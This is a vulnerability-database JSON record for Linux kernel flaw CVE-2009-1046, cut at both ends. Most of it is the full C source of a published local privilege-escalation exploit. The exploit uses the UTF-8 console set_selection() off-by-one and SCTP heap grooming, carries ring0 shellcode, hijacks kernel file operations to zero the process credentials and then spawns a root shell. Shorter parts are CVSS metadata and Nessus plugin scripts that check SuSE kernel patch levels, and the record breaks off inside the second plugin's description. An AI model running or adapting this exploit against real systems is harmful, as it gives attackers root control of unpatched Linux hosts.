"vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.28.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.28.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.28.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.28:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T09:25:08", "description": "", "cvss3": {}, "published": "2009-07-09T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["2009-1046", "CVE-2009-1046"], "modified": "2009-07-09T00:00:00", "id": "EDB-ID:9083", "href": "https://www.exploit-db.com/exploits/9083", "sourceData": "/* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption\r\n * Linux Kernel <= 2.6.28.3 \r\n *\r\n * coded by: sgrakkyu <at> antifork.org\r\n * http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html\r\n *\r\n * Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow\r\n *\r\n * NOTE-1: you need a virtual console attached to the standard output (stdout) \r\n * - physical login\r\n * - ptrace() against some process with the same uid already attached to a VC\r\n * - remote management ..\r\n *\r\n * NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts\r\n * but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)\r\n * If you use an unsupported character expect some sort of recursive fatal ooops:)\r\n *\r\n * Designed to be built as x86-64 binary only (SLUB ONLY)\r\n * SCTP stack has to be available\r\n * \r\n * Tested on target:\r\n * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)\r\n * Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)\r\n * Fedora Core 10 x86_64 (default installed kernel - without selinux)\r\n *\r\n */\r\n\r\n\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sched.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <netinet/sctp.h>\r\n#include <arpa/inet.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/ioctl.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <linux/tiocl.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <sys/mman.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n\r\n#ifndef __x86_64__\r\n#error \"Architecture Unsupported\"\r\n#error \"This code was written for x86-64 target and has to be built as x86-64 binary\"\r\n#else\r\n\r\n#ifndef __u8\r\n#define __u8 uint8_t\r\n#endif\r\n#ifndef __u16\r\n#define __u16 uint16_t\r\n#endif\r\n#ifndef __u32\r\n#define __u32 uint32_t\r\n#endif\r\n#ifndef __u64 \r\n#define __u64 uint64_t\r\n#endif\r\n\r\n\r\n#define STREAM_ZERO 10\r\n#define STREAM_ZERO_ALT 12\r\n\r\n#define SCTP_STREAM 22\r\n#define STACK_SIZE 0x1000\r\n#define PAGE_SIZE 0x1000\r\n#define STRUCT_PAGE 0x0000000000000000\r\n#define STRUCT_PAGE_ALT 0x0000000100000000 \r\n#define CODE_PAGE 0x0000000000010000\r\n#define LOCALHOST \"127.0.0.1\"\r\n#define KMALLOC \"kmalloc-128\"\r\n#define TIMER_LIST_FOPS \"timer_list_fops\"\r\n\r\n#define __msg_f(format, args...) \\\r\n do { fprintf(stdout, format, ## args); } while(0)\r\n\r\n#define __msg(msg) \\\r\n do { fprintf(stdout, \"%s\", msg); } while(0)\r\n\r\n#define __fatal_errno(msg) \\\r\ndo { perror(msg); __free_stuff(); exit(1); } while(0)\r\n\r\n#define __fatal(msg) \\\r\ndo { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)\r\n\r\n\r\n\r\n#define CJUMP_OFF 13\r\nchar ring0[]=\r\n\"\\x57\" // push %rdi\r\n\"\\x50\" // push %rax\r\n\"\\x65\\x48\\x8b\\x3c\\x25\\x00\\x00\\x00\\x00\" // mov %gs:0x0,%rdi\r\n\"\\x48\\xb8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" // mov xxx, %rax\r\n\"\\xff\\xd0\" // callq *%rax\r\n\"\\x58\" // pop %rax\r\n\"\\x5f\" // pop %rdi\r\n\"\\xc3\"; // retq\r\n\r\n\r\n/* conn struct */\r\nstatic __u16 srvport;\r\nstruct sockaddr_in server_s;\r\nstatic struct sockaddr_in caddr;\r\n\r\n/* some fds.. */\r\nstatic int g_array[10];\r\nstatic int fd_zmap_srv=-1;\r\nstatic int kmalloc_fd=-1;\r\nstatic int unsafe_fd[4] = {-1,-1,-1,-1}; \r\n\r\n/* misc */\r\nstatic int dorec = 0, cankill=1, highpage=0;\r\nstatic char cstack[STACK_SIZE*2];\r\nstatic __u16 zstream=STREAM_ZERO;\r\nstatic __u32 uid,gid;\r\nstatic __u64 fops;\r\nstatic pid_t child=0;\r\nstatic char symbuf[20000];\r\n\r\nstatic void __free_stuff()\r\n{\r\n int i;\r\n for(i=3; i<2048; i++) \r\n {\r\n if((unsafe_fd[0] == i || unsafe_fd[1] == i || \r\n unsafe_fd[2] == i || unsafe_fd[3] == i))\r\n continue; \r\n\r\n close(i);\r\n }\r\n}\r\n\r\nstatic void bindcpu()\r\n{\r\n cpu_set_t set;\r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n \r\n if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)\r\n __fatal_errno(\"setaffinity\");\r\n}\r\n\r\n/* parse functions are not bof-free:) */\r\nstatic __u64 get_fops_addr()\r\n{\r\n FILE* stream;\r\n char fbuf[256];\r\n char addr[32];\r\n \r\n stream = fopen(\"/proc/kallsyms\", \"r\");\r\n if(stream < 0)\r\n __fatal_errno(\"open: kallsyms\");\r\n\r\n memset(fbuf, 0x00, sizeof(fbuf));\r\n while(fgets(fbuf, 256, stream) > 0)\r\n {\r\n char *p = fbuf;\r\n char *a = addr;\r\n memset(addr, 0x00, sizeof(addr));\r\n fbuf[strlen(fbuf)-1] = 0;\r\n while(*p != ' ')\r\n *a++ = *p++; \r\n p += 3;\r\n if(!strcmp(p, TIMER_LIST_FOPS))\r\n return strtoul(addr, NULL, 16); \r\n }\r\n\r\n return 0;\r\n}\r\n\r\nstatic int get_total_object(int fd)\r\n{\r\n char name[32];\r\n char used[32];\r\n char total[32];\r\n char *ptr[] = {name, used, total};\r\n int ret,i,toread=sizeof(symbuf)-1;\r\n char *p = symbuf;\r\n\r\n lseek(fd, 0, SEEK_SET);\r\n memset(symbuf, 0x00, sizeof(symbuf));\r\n while( (ret = read(fd, p, toread)) > 0)\r\n {\r\n p += ret; \r\n toread -= ret;\r\n }\r\n\r\n p = symbuf;\r\n do\r\n {\r\n for(i=0; i<sizeof(ptr)/sizeof(void*); i++)\r\n {\r\n char *d = ptr[i];\r\n while(*p != ' ')\r\n *d++ = *p++; \r\n *d = 0;\r\n while(*p == ' ')\r\n p++;\r\n }\r\n \r\n while(*p++ != '\\n');\r\n \r\n if(!strcmp(KMALLOC, name))\r\n return atoi(total); \r\n\r\n } while(*p != 0);\r\n return 0;\r\n}\r\n\r\n\r\nstatic void ring0c(void* t)\r\n{\r\n int i;\r\n __u32 *p = t;\r\n for(i=0; i<1100; i++,p++)\r\n {\r\n if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&\r\n p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)\r\n {\r\n p[0] = p[1] = p[2] = p[3] = 0;\r\n p[4] = p[5] = p[6] = p[7] = 0;\r\n /* dont care about caps */\r\n break;\r\n }\r\n }\r\n}\r\n\r\n\r\nstatic int get_kmalloc_fd()\r\n{\r\n int fd;\r\n fd = open(\"/proc/slabinfo\", O_RDONLY);\r\n if(fd < 0)\r\n __fatal_errno(\"open: slabinfo\");\r\n return fd;\r\n}\r\n\r\n\r\nstatic int write_sctp(int fd, struct sockaddr_in *s, int channel)\r\n{\r\n int ret;\r\n ret = sctp_sendmsg(fd, \"a\", 1,\r\n (struct sockaddr *)s, sizeof(struct sockaddr_in),\r\n 0, 0, channel, 0 ,0);\r\n return ret;\r\n}\r\n\r\n\r\nstatic void set_sctp_sock_opt(int fd, __u16 in, __u16 out)\r\n{\r\n struct sctp_initmsg msg;\r\n int val=1;\r\n socklen_t len_sctp = sizeof(struct sctp_initmsg);\r\n getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);\r\n msg.sinit_num_ostreams=out; \r\n msg.sinit_max_instreams=in;\r\n setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);\r\n setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));\r\n}\r\n\r\n\r\nstatic int create_and_init(void)\r\n{\r\n int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n __fatal_errno(\"socket: sctp\");\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);\r\n return fd;\r\n}\r\n\r\n\r\nstatic void connect_peer(int fd, struct sockaddr_in *s)\r\n{ \r\n int ret;\r\n ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n __fatal_errno(\"connect: one peer\");\r\n}\r\n\r\n\r\nstatic void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)\r\n{\r\n connect_peer(fd,s);\r\n write_sctp(fd, s, stream);\r\n}\r\n\r\n\r\nstatic int clone_thread(void*useless)\r\n{\r\n int o = 1;\r\n int c=0,idx=0;\r\n int fd, ret;\r\n struct sockaddr_in tmp;\r\n socklen_t len;\r\n\r\n bindcpu();\r\n server_s.sin_family = PF_INET;\r\n server_s.sin_port = htons(srvport); \r\n server_s.sin_addr.s_addr = inet_addr(LOCALHOST);\r\n\r\n fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n return -1;\r\n\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM); \r\n setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));\r\n\r\n ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n return -1;\r\n\r\n ret = listen(fd, 100);\r\n if(ret < 0)\r\n return -1;\r\n\r\n len = sizeof(struct sockaddr_in);\r\n while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)\r\n {\r\n if(dorec != 0 && c >= dorec && idx < 10)\r\n {\r\n g_array[idx] = ret;\r\n if(idx==9)\r\n {\r\n fd_zmap_srv = ret;\r\n caddr = tmp;\r\n break;\r\n }\r\n idx++;\r\n }\r\n c++; \r\n write_sctp(ret, &tmp, zstream);\r\n }\r\n \r\n sleep(1);\r\n return 0; \r\n}\r\n\r\n\r\nstatic int do_mmap(unsigned long base, int npages)\r\n{\r\n void*addr = mmap((void*)base, PAGE_SIZE*npages,\r\n PROT_READ|PROT_WRITE|PROT_EXEC, \r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);\r\n\r\n if(MAP_FAILED == addr)\r\n return -1;\r\n\r\n memset(addr, 0x00, PAGE_SIZE*npages);\r\n \r\n return 0;\r\n}\r\n\r\npid_t start_listener()\r\n{\r\n pid_t pid;\r\n pid = clone(clone_thread, cstack+STACK_SIZE-8, \r\n CLONE_VM|CLONE_FILES|SIGCHLD, NULL);\r\n \r\n return pid;\r\n} \r\n\r\nstatic void do_socks(struct sockaddr_in *s, __u16 stream)\r\n{\r\n int i,fd;\r\n int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;\r\n int next=8;\r\n\r\n for(i=0; next != 0; i++)\r\n {\r\n fd = create_and_init();\r\n\r\n tmp_n_objs = get_total_object(kmalloc_fd); \r\n if(!dorec && tmp_n_objs != n_objs)\r\n dorec=i; \r\n\r\n conn_and_write(fd, s, stream);\r\n if(dorec)\r\n next--;\r\n }\r\n}\r\n\r\n\r\nstatic void clr(int fd)\r\n{\r\n /* use termcap instead..*/\r\n write(fd, \"\\33[H\\33[J\", 6); \r\n}\r\n\r\nstatic char tiobuffer[2048];\r\nvoid alloc_tioclinux()\r\n{\r\n int i;\r\n char out[128*3];\r\n /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */\r\n char utf8[3] = { 0xE2, 0x94, 0xBC }; \r\n //char utf8[3] = { 0xE2, 0x80, 0xBC }; \r\n struct tiocl_selection *sel;\r\n char *t;\r\n void *v = malloc(sizeof(struct tiocl_selection) + 1);\r\n t = (char*)v; \r\n sel = (struct tiocl_selection *)(t+1);\r\n memset(out, 0x41, sizeof(out)); \r\n for(i=0; i<128; i++) \r\n {\r\n tiobuffer[(i*3)]=utf8[0];\r\n tiobuffer[(i*3)+1]=utf8[1];\r\n tiobuffer[(i*3)+2]=utf8[2];\r\n }\r\n\r\n *t = TIOCL_SETSEL;\r\n sel->xs = 1;\r\n sel->ys = 1;\r\n sel->xe = 43;\r\n //sel->xe = 42; /* no overflow */\r\n sel->ye = 1;\r\n \r\n write(1, tiobuffer, sizeof(tiobuffer));\r\n if(ioctl(1, TIOCLINUX, v) < 0)\r\n __fatal(\"[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\\n\");\r\n}\r\n\r\n\r\n\r\nstatic void migrate_evil_fd()\r\n{\r\n int i;\r\n pid_t child;\r\n\r\n __msg(\"[**] Migrate evil unsafe fds to child process..\\n\");\r\n child = fork();\r\n if(!child)\r\n {\r\n\r\n /* preserve evil fds */\r\n setsid(); \r\n if(!cankill) /* cant die .. */\r\n while(1)\r\n sleep(1);\r\n else\r\n {\r\n sleep(10); /* wait execve() before */ \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]); \r\n\r\n exit(1);\r\n }\r\n }\r\n else\r\n {\r\n if(!cankill)\r\n __msg_f(\"[**] Child process %d _MUST_ NOT die ... keep it alive:)\\n\", child);\r\n }\r\n}\r\n\r\n\r\nstatic void trigger_fault()\r\n{\r\n char *argv[]={\"/bin/sh\", NULL};\r\n int fd,i;\r\n\r\n fd = open(\"/proc/timer_list\", O_RDONLY);\r\n if(fd >= 0)\r\n {\r\n ioctl(fd, 0, 0);\r\n __free_stuff();\r\n migrate_evil_fd();\r\n \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]);\r\n\r\n if(!getuid())\r\n {\r\n __msg(\"[**] Got root!\\n\");\r\n execve(\"/bin/sh\", argv, NULL); \r\n }\r\n }\r\n else\r\n {\r\n __msg(\"[**] Cannot open /proc/timer_list\");\r\n __free_stuff();\r\n }\r\n}\r\n\r\n\r\n\r\nstatic void overwrite_fops( int sender, \r\n struct sockaddr_in *to_receiver,\r\n int receiver)\r\n{\r\n char *p = NULL;\r\n if(!highpage)\r\n p++;\r\n else\r\n p = (void*)STRUCT_PAGE_ALT;\r\n\r\n __u64 *uip = (__u64*)p; \r\n *uip = fops;\r\n write_sctp(sender, to_receiver, 1); \r\n sleep(1);\r\n trigger_fault();\r\n}\r\n\r\nstatic __u16 get_port()\r\n{\r\n __u16 r = (__u16)getpid();\r\n if(r <= 0x400)\r\n r+=0x400;\r\n return r;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int peerx, peery,i;\r\n __u64 *patch;\r\n\r\n srvport = get_port();\r\n\r\n uid=getuid();\r\n gid=getgid();\r\n fops=get_fops_addr() + 64; \r\n if(!fops)\r\n {\r\n __msg(\"[!!] Unable to locate symbols...\\n\");\r\n return 1;\r\n }\r\n\r\n __msg_f(\"[**] Patching ring0 shellcode with userspace addr: %p\\n\", ring0c);\r\n patch = (__u64*)(ring0 + CJUMP_OFF);\r\n *patch = (__u64)ring0c;\r\n\r\n __msg_f(\"[**] Using port: %d\\n\", srvport);\r\n __msg(\"[**] Getting slab info...\\n\");\r\n kmalloc_fd = get_kmalloc_fd();\r\n if(!get_total_object(kmalloc_fd)) \r\n __fatal(\"[!!] Only SLUB allocator supported\\n\");\r\n \r\n\r\n __msg(\"[**] Mapping Segments...\\n\"); \r\n __msg(\"[**] Trying mapping safe page...\");\r\n if(do_mmap(STRUCT_PAGE, 1) < 0)\r\n {\r\n __msg(\"Page Protection Present (Unable to Map Safe Page)\\n\");\r\n __msg(\"[**] Mapping High Address Page (dont kill placeholder child)\\n\");\r\n if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)\r\n __fatal_errno(\"mmap\"); \r\n\r\n cankill=0; /* dont kill child owning unsafe fds.. */\r\n highpage=1; /* ssnmap in higher pages */\r\n zstream=STREAM_ZERO_ALT; \r\n } \r\n else\r\n __msg(\"Done\\n\");\r\n\r\n __msg(\"[**] Mapping Code Page... \");\r\n if(do_mmap(CODE_PAGE, 1) < 0)\r\n __fatal_errno(\"mmap\");\r\n else\r\n __msg(\"Done\\n\");\r\n\r\n memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));\r\n\r\n __msg(\"[**] Binding on CPU 0\\n\"); \r\n bindcpu(); \r\n\r\n __msg(\"[**] Start Server Thread..\\n\");\r\n child = start_listener();\r\n sleep(3); \r\n \r\n do_socks(&server_s, zstream);\r\n for(i=0; i<7; i++)\r\n {\r\n close(g_array[8-1-i]); \r\n }\r\n clr(1); \r\n alloc_tioclinux(); // trigger overflow\r\n peerx = create_and_init();\r\n connect_peer(peerx, &server_s);\r\n peery = create_and_init();\r\n connect_peer(peery, &server_s);\r\n \r\n sleep(1);\r\n\r\n unsafe_fd[0] = peerx;\r\n unsafe_fd[1] = g_array[8];\r\n unsafe_fd[2] = peery;\r\n unsafe_fd[3] = g_array[9];\r\n \r\n __msg(\"\\n\"); \r\n __msg_f(\"[**] Umapped end-to-end fd: %d\\n\", fd_zmap_srv); \r\n __msg_f(\"[**] Unsafe fd: ( \");\r\n\r\n for(i=0; i<4; i++)\r\n __msg_f(\"%d \", unsafe_fd[i]);\r\n __msg(\")\\n\"); \r\n \r\n\r\n __msg(\"[**] Hijacking fops...\\n\");\r\n overwrite_fops(fd_zmap_srv, &caddr, peery);\r\n\r\n /* if u get here.. something nasty happens...may crash..*/\r\n __free_stuff();\r\n __msg(\"[**] Exploit failed.. freezing process\\n\");\r\n kill(getpid(), SIGSTOP);\r\n return 0;\r\n}\r\n\r\n#endif\r\n\r\n// milw0rm.com [2009-07-09]", "sourceHref": "https://www.exploit-db.com/download/9083", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:23:57", "description": "This Linux kernel update for SUSE Linux Enterprise 10 Service Pack 2 fixes various bugs and several security issues.\n\nThe following security issues were fixed: CVE-2009-0675: The skfp_ioctl function in drivers/net/skfp/skfddi.c in the Linux kernel permits SKFP_CLR_STATS requests only when the CAP_NET_ADMIN capability is absent, instead of when this capability is present, which allows local users to reset the driver statistics, related to an 'inverted logic' issue.\n\n - The sock_getsockopt function in net/core/sock.c in the Linux kernel does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel memory via an SO_BSDCOMPAT getsockopt request. (CVE-2009-0676)\n\n - The clone system call in the Linux kernel allows local users to send arbitrary signals to a parent process from an unprivileged child process by launching an additional child process with the CLONE_PARENT flag, and then letting this new process exit. (CVE-2009-0028)\n\n - The Linux kernel does not check when a user attempts to set RLIMIT_CPU to 0 until after the change is made, which allows local users to bypass intended resource limits. (CVE-2008-1294)\n\n - Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. (CVE-2009-0065)\n\n - The console selection feature in the Linux kernel when the UTF-8 console is used, allows physically proximate attackers to cause a denial of service (memory corruption) by selecting a small number of 3-byte UTF-8 characters, which triggers an an off-by-two memory error. It is is not clear if this can be exploited at all. (CVE-2009-1046)\n\nAlso a huge number of regular bugs were fixed, please see the RPM changelog for full details.", "cvss3": {}, "published": "2012-05-17T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 6113)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1294", "CVE-2009-0028", "CVE-2009-0065", "CVE-2009-0675", "CVE-2009-0676", "CVE-2009-1046"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KERNEL-6113.NASL", "href": "https://www.tenable.com/plugins/nessus/59136", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59136);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1294\", \"CVE-2009-0028\", \"CVE-2009-0065\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-1046\");\n\n script_name(english:\"SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 6113)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This Linux kernel update for SUSE Linux Enterprise 10 Service Pack 2\nfixes various bugs and several security issues.\n\nThe following security issues were fixed: CVE-2009-0675: The\nskfp_ioctl function in drivers/net/skfp/skfddi.c in the Linux kernel\npermits SKFP_CLR_STATS requests only when the CAP_NET_ADMIN capability\nis absent, instead of when this capability is present, which allows\nlocal users to reset the driver statistics, related to an 'inverted\nlogic' issue.\n\n - The sock_getsockopt function in net/core/sock.c in the\n Linux kernel does not initialize a certain structure\n member, which allows local users to obtain potentially\n sensitive information from kernel memory via an\n SO_BSDCOMPAT getsockopt request. (CVE-2009-0676)\n\n - The clone system call in the Linux kernel allows local\n users to send arbitrary signals to a parent process from\n an unprivileged child process by launching an additional\n child process with the CLONE_PARENT flag, and then\n letting this new process exit. (CVE-2009-0028)\n\n - The Linux kernel does not check when a user attempts to\n set RLIMIT_CPU to 0 until after the change is made,\n which allows local users to bypass intended resource\n limits. (CVE-2008-1294)\n\n - Buffer overflow in net/sctp/sm_statefuns.c in the Stream\n Control Transmission Protocol (sctp) implementation in\n the Linux kernel allows remote attackers to have an\n unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk\n with a large stream ID. (CVE-2009-0065)\n\n - The console selection feature in the Linux kernel when\n the UTF-8 console is used, allows physically proximate\n attackers to cause a denial of service (memory\n corruption) by selecting a small number of 3-byte UTF-8\n characters, which triggers an an off-by-two memory\n error. It is is not clear if this can be exploited at\n all. (CVE-2009-1046)\n\nAlso a huge number of regular bugs were fixed, please see the RPM\nchangelog for full details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1294.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0065.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0675.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0676.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1046.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6113.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20, 119, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-default-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-smp-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-source-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-syms-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-debug-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-default-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-kdump-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-smp-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-source-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-syms-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-2.6.16.60-0.37_f594963d\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:08:57", "description": "This Linux kernel update for SUSE Linux Enterprise 10 Service Pack 2 fixes various bugs and several security issues.\n\nThe following security issues were fixed: CVE-2009-0675: The skfp_ioctl function in drivers/net/skfp/skfddi.c in the Linux kernel permits SKFP_CLR_STATS requests only when the CAP_NET_ADMIN capability is absent, instead of when this capability is present, which allows local users to reset the driver statistics, related to an 'inverted logic' issue.\n\n - The sock_getsockopt function in net/core/sock.c in the Linux kernel does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel memory via an SO_BSDCOMPAT getsockopt request. (CVE-2009-0676)\n\n - The clone system call in the Linux kernel allows local users to send arbitrary signals to a parent process from an unprivileged child process by launching an additional child process with the CLONE_PARENT flag, and then letting this new process exit. (CVE-2009-0028)\n\n - The Linux kernel does not check when a user attempts to set RLIMIT_CPU to 0 until after the change is made, which allows local users to bypass intended resource limits. (CVE-2008-1294)\n\n - Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. (CVE-2009-0065)\n\n - The console selection feature in the Linux kernel when the UTF-8 console is used, allows physically proximate attackers 